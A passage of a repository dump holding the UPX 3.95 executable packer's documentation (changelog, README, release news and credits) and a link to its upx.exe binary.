133 | * win32/pe & arm/pe: added option --compress-icons=3 to compress all icons
134 |
135 | Changes in 2.90 beta (08 Oct 2006):
136 | * LZMA algorithm support for most of the 32-bit and 64-bit file formats;
137 | use new option '--lzma' to enable
138 | * new format: BSD/elf386 supporting FreeBSD, NetBSD and OpenBSD
139 | via auto-detection of PT_NOTE or EI_OSABI
140 | * arm/pe: all the NRV compression methods are now supported
141 | (only NRV2D is missing in thumb mode)
142 | * linux/elf386, linux/ElfAMD: remember /proc/self/exe in environment
143 | * major source code changes: the runtime decompression stubs are now
144 | built from internal ELF objects
145 |
146 | ==================================================================
147 |
148 | Changes in 2.03 (07 Nov 2006):
149 | * bvmlinuz/386: fix for kernels not at 0x100000; also allow x86_64
150 | * linux/elf386: work around Linux kernel bug (0-length .bss needs PF_W)
151 |
152 | Changes in 2.02 (13 Aug 2006):
153 | * linux/386: work around Linux kernel bug (".bss" requires PF_W)
154 | * linux/ppc32, mach/ppc32: compressed programs now work on a 405 CPU
155 | * vmlinuz/386: fixed zlib uncompression problem on DOS
156 |
157 | Changes in 2.01 (06 Jun 2006):
158 | * arm/pe: better DLL support
159 | * dos/exe: device driver support added
160 | * linux/386: Fix --force-execve for PaX, grSecurity, and strict SELinux.
161 | /tmp must support execve(); therefore /tmp cannot be mounted 'noexec'.
162 | * win32/pe & arm/pe: added new option '--keep-resource=' for
163 | excluding selected resources from compression
164 |
165 | Changes in 2.00 (27 Apr 2006):
166 | * linux/386: the stub now prints an error message if some strict
167 | SELinux mode does prevent runtime decompression and execution
168 | (for a fully SELinux-compatible but otherwise inferior compression
169 | format you can use the '--force-execve' option)
170 | * linux/386: worked around a problem where certain Linux kernels
171 | clobber the %ebx register during a syscall
172 | * win32/pe: disable filters for files with broken PE headers
173 |
174 | Changes in 1.96 beta (13 Apr 2006):
175 | * arm/pe: added filter support
176 | * win32/pe: removed an unnecessary check so that Delphi 2006 and
177 | Digital Mars C++ programs finally are supported
178 |
179 | Changes in 1.95 beta (09 Apr 2006):
180 | * arm/pe: added DLL support
181 | * arm/pe: added thumb mode stub support
182 | * arm/pe: added unpacking support
183 | * win32/pe: really worked around R6002 runtime errors
184 |
185 | Changes in 1.94 beta (11 Mar 2006):
186 | * new format: added support for arm/pe (ARM executables running on WinCE)
187 | * new format: added support for linux elf/amd64
188 | * new format: added support for linux elf/ppc32
189 | * new format: added support for mach/ppc32 (Apple Mac OS X)
190 | * win32/pe: hopefully working "load config" support
191 | * win32/pe: R6002 runtime errors worked around
192 | * win32/pe: the stub now clears the dirty stack
193 |
194 | Changes in 1.93 beta (07 Feb 2005):
195 | * vmlinuz/386: fixes to support more kernels
196 |
197 | Changes in 1.92 beta (20 Jul 2004):
198 | * win32/pe: added option '--strip-loadconf' to strip the SEH load
199 | config section [NOTE: this option is obsolete since UPX 1.94]
200 | * win32/pe: try to detect .NET (win32/net) files [not yet supported by UPX]
201 | * vmlinux/386: new format that directly supports building Linux kernels
202 | * source code: now compiles cleanly under Win64
203 |
204 | Changes in 1.91 beta (30 Jun 2004):
205 | * djgpp2/coff: added support for recent binutils versions
206 | * linux/elf386, linux/sh386: lots of improvements
207 | * vmlinuz/386: added support for recent kernels
208 | * watcom/le: don't crash on files without relocations
209 | * win32/pe: stricter checks of some PE values
210 | * option '--brute' now implies '--crp-ms=999999'.
211 | * source code: much improved portability using ACC, the
212 | Automatic Compiler Configuration
213 | * source code: compile fixes for strict ISO C++ compilers
214 | * source code: compile fixes for Win64
215 | * re-synced with upx 1.25 branch
216 |
217 | Changes in 1.90 beta (11 Nov 2002):
218 | * implemented several new options for finer compression control:
219 | '--all-methods', '--all-filters' and '--brute'
220 | * ps1/exe: new format - UPX now supports PlayStation One programs
221 | * linux/386: added the option '--force-execve'
222 | * vmlinuz/386: better kernel detection and sanity checks
223 | * re-synced with upx 1.24 branch
224 | * documentation updates
225 |
226 | Changes in 1.11 beta (20 Dec 2000):
227 | * vmlinuz/386: new format - UPX now supports bootable linux kernels
228 | * linux/elf386: added the new ELF direct-to-memory executable format - no
229 | more temp files are needed for decompression!
230 | * linux/sh386: added the new shell direct-to-memory executable format - no
231 | more temp files are needed for decompression!
232 | * reduced overall memory requirements during packing
233 | * quite a number of internal source code rearrangements
234 |
235 | ==================================================================
236 |
237 | Changes in 1.25 (29 Jun 2004)
238 | * INFO: http://upx.sourceforge.net is the permanent UPX home page
239 | * watcom/le: don't crash on files without relocations
240 | * win32/pe: stricter checks of some PE values
241 | * source code: much improved portability using ACC, the
242 | Automatic Compiler Configuration
243 | * source code: compile fixes for strict ISO C++ compilers
244 | * source code: compile fixes for Win64
245 |
246 | Changes in 1.24 (07 Nov 2002)
247 | * djgpp2/coff: stricter check of the COFF header to work around a
248 | problem with certain binutils versions
249 |
250 | Changes in 1.23 (05 Sep 2002)
251 | * atari/tos: fixed an unpacking problem where a buffer was too
252 | small (introduced in 1.22)
253 | * linux/386: don't give up too early if a single block turns out
254 | to be incompressible
255 | * documentation: added some quick tips how to achieve the best
256 | compression ratio for the final release of your application
257 | * fixed a rare situation where the exit code was not set correctly
258 |
259 | Changes in 1.22 (27 Jun 2002)
260 | * atari/tos: the stub now flushes the CPU cache to avoid
261 | problems on 68030+ machines
262 | * source code: additional compiler support for Borland C++,
263 | Digital Mars C++ and Watcom C++
264 |
265 | Changes in 1.21 (01 Jun 2002)
266 | * New option '--crp-ms=' for slightly better compression at the cost
267 | of higher memory requirements during compression.
268 | Try 'upx --best --crp-ms=100000'. See the docs for more info.
269 | * source code: portability fixes
270 | * source code: compile fixes for g++ 3.0 and g++ 3.1
271 |
272 | Changes in 1.20 (23 May 2001)
273 | * slightly faster compression
274 | * work around a gcc problem in the latest djgpp2 distribution
275 | * watcom/le: fixed detection of already compressed files
276 | * win32/pe: do not compress RT_MANIFEST resource types
277 | * win32/pe: improved the error message for empty resource sections
278 | * [NOTE: the jump from 1.08 to 1.20 is to avoid confusion with
279 | our unstable development releases 1.1x and 1.9x]
280 |
281 | Changes in 1.08 (30 Apr 2001)
282 | * new native port to atari/tos
283 | * win32/pe: shortened the identstring
284 | * source code: portability fixes - UPX now builds cleanly under m68k CPUs
285 |
286 | Changes in 1.07 (20 Feb 2001)
287 | * win32/pe: corrected the TLS callback check
288 | * win32/pe: really fixed that rare bug in relocation handling
289 | * win32/pe: experimental support for SizeOfHeaders > 0x1000
290 | * win32/pe: check for superfluous data between sections
291 | * win32/pe: compressing screensavers (.scr) should finally work
292 |
293 | Changes in 1.06 (27 Jan 2001)
294 | * win32/pe: the check for TLS callbacks introduced in 1.05
295 | was too strict - disabled for now
296 | * dos/com: decreased the decompressor stack size a little bit
297 |
298 | Changes in 1.05 (24 Jan 2001)
299 | * win32/pe: refuse to compress programs with TLS callbacks
300 | * win32/pe: stub changes to avoid slowdowns with some virus monitors
301 | * win32/pe: reverted the relocation handling changes in 1.04
302 | * linux/386: dont try to compress Linux kernel images (have a look
303 | at the unstable UPX 1.1x beta versions for that)
304 |
305 | Changes in 1.04 (19 Dec 2000)
306 | * dos/exe: fixed an internal error when using '--no-reloc'
307 | * win32/pe: fixed a rare bug in the relocation handling code
308 | * some tunings for the default compression level
309 |
310 | Changes in 1.03 (30 Nov 2000)
311 | * linked with a new version of the NRV compression library:
312 | - improved compression ratio a little bit
313 | - overall significantly faster compression
314 | - much faster when using high compression levels like '-9' or '--best'
315 | - much faster with large files
316 | * atari/tos: added support for FreeMiNT
317 | * the 32-bit DOS version now uses the new CWSDSTUB extender
318 |
319 | Changes in 1.02 (13 Sep 2000)
320 | * watcom/le: fixed a problem with the Causeway extender
321 | * win32/pe: don't automatically strip relocs if they seem needed
322 | * support multiple backup generations when using '-k'
323 | * updated the console screen driver
324 |
325 | Changes in 1.01 (09 Apr 2000)
326 | * win32/pe: fixed an uncompression problem in DLLs with empty
327 | fixup sections
328 | * win32/pe: fixed another rare uncompression problem - a field in the
329 | PE header was set incorrectly
330 |
331 | Changes in 1.00 (26 Mar 2000)
332 | * documentation updates
333 | * watcom/le: do not duplicate the non-resident name table
334 | * win32/pe: fixed an import handling problem: sometimes too much data
335 | could be deleted from a file -> the uncompressed file would not work
336 | anymore
337 |
338 | Changes in 0.99.3 (07 Mar 2000)
339 | * win32/pe: fixed a rare problem in the stub string handling part
340 |
341 | Changes in 0.99.2 (02 Mar 2000)
342 | * dos/exe: fixed a typo causing an internal error (introduced in 0.99.1)
343 |
344 | Changes in 0.99.1 (29 Feb 2000)
345 | * win32/pe: fixed some object alignments which were causing
346 | problems when loading compressed DLLs under Windows NT/2000
347 |
348 | Changes in 0.99 (25 Feb 2000)
349 | * FULL SOURCE CODE RELEASED UNDER THE TERMS OF THE GNU GPL
350 | * win32/pe: changed default to '--strip-relocs=1'
351 | * dos/com and dos/sys: fixed a bad decompressor problem
352 | * linux/386: the counter for the progress indicator was off by one
353 |
354 | Changes in 0.94 (06 Dec 1999)
355 | * win32/pe: the stub now calls ExitProcess in case of import errors
356 | * under DOS and Windows, the environment variable UPX now accepts
357 | a '#' as replacement for '=' because of a COMMAND.COM limitation
358 |
359 | Changes in 0.93 (22 Nov 1999)
360 | * win32/pe: fixed --strip-relocs problem with uncompression
361 | * win32/pe: fixed a bug which could produce a broken decompressor stub
362 | * linux/386: yet another FreeBSD compatibility fix
363 |
364 | Changes in 0.92 (14 Nov 1999)
365 | * win32/pe: really fixed that one line (see below)
366 |
367 | Changes in 0.91 (13 Nov 1999)
368 | * win32/pe: an important one-line fix for the newly introduced problems
369 | * dos/com and dos/sys: fixed an internal error
370 | * dos/exe: correctly restore cs when uncompressing
371 |
372 | Changes in 0.90 (10 Nov 1999)
373 | * all formats: '--overlay=copy' now is the default overlay mode
374 | * improved compression ratio for most files
375 | * win32/pe: uncompression is finally supported
376 | * win32/pe: never compress REGISTRY resources
377 | * win32/pe: headersize was not set in PE header
378 | * win32/pe: resource handling is rewritten
379 | * win32/pe: the last :-) TLS problem is fixed
380 | * win32/pe: somewhat less memory is required during compression
381 | * linux/386: fixed compression of scripts which was broken since 0.71
382 | * linux/386: more FreeBSD compatibility issues
383 | * changed option: '-i' now prints some more details during compression
384 | (not finished yet)
385 |
386 | Changes in 0.84 (04 Oct 1999)
387 | * dos/exe: fixed a rare problem where the decompressor could crash
388 | * some other minor fixes
389 |
390 | Changes in 0.83 (17 Sep 1999)
391 | * dos/exe: fixed minimal memory requirement problem for some files
392 | * win32/pe: fixed a bug which caused a crash in some compressed files
393 | * linux/386: various improvements in the stub; also, for the sake
394 | of FreeBSD users, the stub is now branded as Linux/ELF
395 |
396 | Changes in 0.82 (16 Aug 1999)
397 | * dos/exe: fixed a decompressor bug which could cause crash on some files
398 | * linux/386: section headers are now stripped from the stub so that
399 | 'strip' won't ruin a compressed file any longer
400 | * wc/le: support for stack not in the last object disabled again
401 | * win32/pe: removed some unneeded data
402 |
403 | Changes in 0.81 (04 Aug 1999)
404 | * win32/pe: fixed an important bug in import handling
405 | * dos/com: fixed an internal error that could happen with very small files
406 |
407 | Changes in 0.80 (03 Aug 1999)
408 | * you can set some default options in the environment var 'UPX'
409 | * dos/com: the decompressor stub now checks for enough free memory
410 | * dos/exe: decompressor rewritten, some bugs are fixed
411 | * dos/exe: new option '--no-reloc': no relocation data is put into
412 | the DOS header
413 | * tmt/adam: added support for more stubs, detect already packed files
414 | * tmt/adam: new option '--copy-overlay'
415 | * wc/le: reduced memory requirement during uncompression
416 | * wc/le: support files which do not contain their stack in the last object
417 | * wc/le: fixed a bug which could cause a crash, improved relocation
418 | handling
419 | * wc/le: new option '--copy-overlay'
420 | * win32/pe: '--compress-icons=2' is now the default
421 | * win32/pe: even better TLS support
422 | * win32/pe: versioninfo works on NT
423 | * win32/pe: import by ordinal from kernel32.dll works
424 | * win32/pe: other import improvements: importing a nonexistent DLL
425 | results in a usual Windows message, importing a nonexistent function
426 | results in program exit (instead of crash ;-)
427 | * win32/pe: new option: '--compress-resources=0'
428 | * win32/pe: reduced memory requirement during uncompression, some
429 | files might even require LESS memory when they're compressed
430 | * win32/pe: TYPELIBs should work now
431 | * win32/pe: improved relocation handling, 16-bit relocations should work
432 | * win32/pe: new option '--strip-relocs' (only if you know what you are doing)
433 | * win32/pe: new option '--copy-overlay'
434 | * important internal changes: now the stubs are built at runtime
435 |
436 | Changes in 0.72 (12 May 1999)
437 | * tmt/adam: fixed a serious problem in the decompressor stub; all
438 | compressed tmt files should be recompressed
439 | * win32/pe: fixed the 'shared sections not supported' warning:
440 | read-only shared sections are fine
441 | * win32/pe: never compress TYPELIB resources
442 | * win32/pe: compressed files are hopefully less suspicious to heuristic
443 | virus scanners now
444 | * linux/386: minor decompressor stub updates, nicer progress bar
445 |
446 | Changes in 0.71 (19 Apr 1999)
447 | * dos/exe: added option '--no-overlay'
448 | * linux/386: various improvements in the stub, most notably the
449 | overhead for an extra cleanup process has been removed
450 | * win32/pe: added support for export forwarders
451 | * win32/pe: added support for DLLs without entry point or imports
452 | * win32/pe: yet another .bss fix
453 | * win32/pe: new option '--compress-icons=2': compress all icons
454 | which are not in the first icon directory
455 | * win32/pe: rearranged stub to avoid false alerts from some virus scanners
456 |
457 | Changes in 0.70 (30 Mar 1999)
458 | * added support for linux/386 executables
459 | * improved compression ratio quite a bit
460 | * added new compression level '--best' to squeeze out even some more bytes
461 | * win32/pe: TLS support is much better now
462 | * win32/pe: --compress-icons=0 should now work as well
463 | * the usual minor fixes for win32/pe
464 |
465 | Changes in 0.62 (16 Mar 1999)
466 | * win32/pe: --compress-icons and --compress-exports are on now by default
467 | * win32/pe: --compress-icons should really work now
468 | * win32/pe: fixed a problem with embedded .bss sections
469 |
470 | Changes in 0.61 (08 Mar 1999)
471 | * atari/tos: fixed a problem where the bss segment could become too small
472 |
473 | Changes in 0.60 (06 Mar 1999)
474 | * win32/pe: fixed file corruption when the size of the export data is invalid
475 | * win32/pe: fixed a problem with empty resource data
476 | * win32/pe: compressed file alignment set to minimum value
477 | * win32/pe: made all compressed sections writable
478 | * fixed some other win32/pe bugs
479 | * fixed an address optimization problem for some non-Watcom LE files
480 | * fixed a bug which could make UPX hang when an exe header contained
481 | an illegal value
482 | * added some compression flags for the win32/pe format
483 | * added support for Atari ST/TT executables (atari/tos)
484 | * improved compression ratio
485 | * improved compression speed
486 |
487 | Changes in 0.51 (14 Jan 1999)
488 | * fixed a small bug in the PE header that would prevent some compressed
489 | win32/pe executables from running under Windows NT and WINE
490 |
491 | Changes in 0.50 (03 Jan 1999)
492 | * added support for PE format executables (win32/pe & rtm32/pe)
493 | * added support for TMT executables (tmt/adam)
494 | * fixed a dos/sys bug that affected OpenDOS
495 |
496 | Changes in 0.40 (05 Oct 1998)
497 | * improved compression ratio
498 | * fixed a small but fatal bug in dos/sys introduced in 0.30
499 | * fixed a rare bug in dos/exe
500 | * worked around a bug in djgpp's strip 2.8
501 | * djgpp/coff: Allegro packfile support should work now
502 | * added dos/exeh compression method (works on 386+)
503 |
504 | Changes in 0.30 (27 Jul 1998)
505 | * fixed a serious bug in the 32-bit compressors - please don't use
506 | djgpp/coff and watcom/le compressed files from previous versions,
507 | some of them are possibly damaged!
508 | * the 16-bit uncompressors are a little bit shorter & faster
509 | * fixed progress indicator for VESA and SVGA text modes
510 |
511 | Changes in 0.20 (05 Jul 1998)
512 | * second public beta release
513 | * too many changes to list here
514 |
515 | Changes in 0.05 (26 May 1998)
516 | * first public beta release
517 |
518 |
519 | # vim:set syntax=off tw=0 ts=4 sw=4 et: -*- coding: utf-8 -*-
520 |
--------------------------------------------------------------------------------
/upx-3.95-win64/README:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 |
16 | WELCOME
17 | =======
18 |
19 | Welcome to UPX !
20 |
21 | Please don't forget to read the file LICENSE - UPX is distributed
22 | under the GNU General Public License (GPL) with special exceptions
23 | allowing the distribution of all compressed executables, including
24 | commercial programs.
25 |
26 |
27 | INTRODUCTION
28 | ============
29 |
30 | UPX is an advanced executable file compressor. UPX will typically
31 | reduce the file size of programs and DLLs by around 50%-70%, thus
32 | reducing disk space, network load times, download times and
33 | other distribution and storage costs.
34 |
35 | Programs and libraries compressed by UPX are completely self-contained
36 | and run exactly as before, with no runtime or memory penalty for most
37 | of the supported formats.
38 |
39 | UPX supports a number of different executable formats, including
40 | Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs,
41 | and Linux executables and kernels.
42 |
43 | UPX is free software distributed under the term of the GNU General
44 | Public License. Full source code is available.
45 |
46 | UPX may be distributed and used freely, even with commercial applications.
47 | See the UPX License Agreement for details.
48 |
49 | UPX is rated number one in the well-known Archive Comparison Test. Visit
50 | http://compression.ca/ .
51 |
52 | UPX aims to be Commercial Quality Freeware.
53 |
54 |
55 | SHORT DOCUMENTATION
56 | ===================
57 |
58 | 'upx program.exe' will compress a program or DLL. For best compression
59 | results try 'upx --brute program.exe'.
60 |
61 | Please see the file UPX.DOC for the full documentation. The files
62 | NEWS and BUGS also contain various tidbits of information.
63 |
64 |
65 | DISCLAIMER
66 | ==========
67 |
68 | UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.
69 |
70 | Having said that, we think that UPX is quite stable now. Indeed we
71 | have compressed lots of files without any problems. Also, the
72 | current version has undergone several months of beta testing -
73 | actually it's almost 8 years since our first public beta.
74 |
75 | This is the first production quality release, and we plan that future
76 | releases will be backward compatible with this version.
77 |
78 | Please report all problems or suggestions to the authors. Thanks.
79 |
80 |
81 | THE FUTURE
82 | ==========
83 |
84 | - AArch64 (64-bit ARM) for Linux and iOS.
85 |
86 | - The Linux approach could probably get ported to a lot of other Unix
87 | variants, at least for other i386 architectures it shouldn't be too
88 | much work. If someone sends me a fresh hard disk and an official
89 | FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-)
90 |
91 | - We will *NOT* add any sort of protection and/or encryption.
92 | This only gives people a false feeling of security because
93 | by definition all protectors/compressors can be broken: the
94 | decompressor stub must reconstruct the original program in memory
95 | at run time, so anyone holding the file can do the same.
96 | And don't trust any advertisement of authors of other executable
97 | compressors about this topic - just do a websearch on "unpackers"...
96 |
97 | - Fix all remaining bugs - keep your reports coming ;-)
98 |
99 | - See the file PROJECTS in the source code distribution if you want
100 | to contribute.
101 |
102 |
103 | COPYRIGHT
104 | =========
105 |
106 | Copyright (C) 1996-2018 Markus Franz Xaver Johannes Oberhumer
107 | Copyright (C) 1996-2018 Laszlo Molnar
108 | Copyright (C) 2000-2018 John F. Reiser
109 |
110 | This program may be used freely, and you are welcome to
111 | redistribute it under certain conditions.
112 |
113 | This program is distributed in the hope that it will be useful,
114 | but WITHOUT ANY WARRANTY; without even the implied warranty of
115 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
116 | UPX License Agreement for more details.
117 |
118 | You should have received a copy of the UPX License Agreement along
119 | with this program; see the file LICENSE. If not, visit the UPX home page.
120 |
121 |
122 | Share and enjoy,
123 | Markus & Laszlo & John
124 |
125 |
126 | Markus F.X.J. Oberhumer Laszlo Molnar
127 |
128 |
129 | John F. Reiser
130 |
131 |
132 |
133 | [ The term UPX is a shorthand for the Ultimate Packer for eXecutables
134 | and holds no connection with potential owners of registered trademarks
135 | or other rights. ]
136 |
137 | [ Feel free to contact us if you have commercial compression requirements
138 | or interesting job offers. ]
139 |
140 |
--------------------------------------------------------------------------------
/upx-3.95-win64/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/upx-3.95-win64/THANKS:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | .___.. .
16 | | |_ _.._ ;_/ __
17 | | [ )(_][ )| \_)
18 | --------------------
19 |
20 | UPX would not be what it is today without the invaluable help of
21 | everybody who was kind enough to spend time testing it, using it
22 | in applications and reporting bugs.
23 |
24 | The following people made especially gracious contributions of their
25 | time and energy in helping to track down bugs, add new features, and
26 | generally assist in the UPX maintainership process:
27 |
28 | Adam Ierymenko
29 | for several ideas for the Linux version
30 | Andi Kleen and Jamie Lokier
31 | for the /proc/self/fd/X and other Linux suggestions
32 | Andreas Muegge
33 | for the Win32 GUI
34 | Atli Mar Gudmundsson
35 | for several comments on the win32/pe stub
36 | Charles W. Sandmann
37 | for the idea with the stubless decompressor in djgpp2/coff
38 | Ice
39 | for debugging the PE headersize problem down
40 | Joergen Ibsen and d'b
41 | for the relocation & address optimization ideas
42 | John S. Fine
43 | for the new version of the dos/exe decompressor
44 | Lukundoo
45 | for beta testing
46 | Michael Devore
47 | for initial dos/exe device driver support
48 | Oleg V. Volkov
49 | for various FreeBSD-specific information
50 | The Owl & G-RoM
51 | for the --compress-icons fix
52 | Ralph Roth
53 | for reporting several bugs
54 | Salvador Eduardo Tropea
55 | for beta testing
56 | Stefan Widmann
57 | for the win32/pe TLS callback support
58 | The WINE project (http://www.winehq.com/)
59 | for lots of useful information found in their PE loader sources
60 | Natascha
61 |
62 |
--------------------------------------------------------------------------------
/upx-3.95-win64/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/upx-3.95-win64/upx.exe
--------------------------------------------------------------------------------